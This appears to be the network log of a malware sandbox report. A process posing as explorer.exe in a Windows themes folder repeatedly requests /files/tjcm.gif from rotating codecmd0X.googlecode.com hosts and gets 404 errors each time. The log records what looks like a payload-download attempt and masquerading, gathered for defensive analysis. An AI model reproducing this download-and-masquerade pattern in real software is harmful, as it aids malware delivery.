                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:17.518125057 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          37192.168.2.45665774.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:17.928752899 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:18.647425890 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:18 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:18.647459984 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          38192.168.2.45666864.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:19.360409975 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:20.074774027 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:19 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:20.074795008 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          39192.168.2.45667466.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:20.459355116 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:21.173336029 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:21 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:21.173366070 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          40192.168.2.45668274.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:21.863100052 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:22.602381945 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:22 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:22.602463961 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          41192.168.2.45669164.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:23.035602093 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:23.740910053 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:23 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:23.740982056 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          42192.168.2.45670166.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:24.451474905 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:25.161976099 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:25 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:25.161994934 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          43192.168.2.45670874.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:25.613358021 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:26.302078962 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:26 GMT
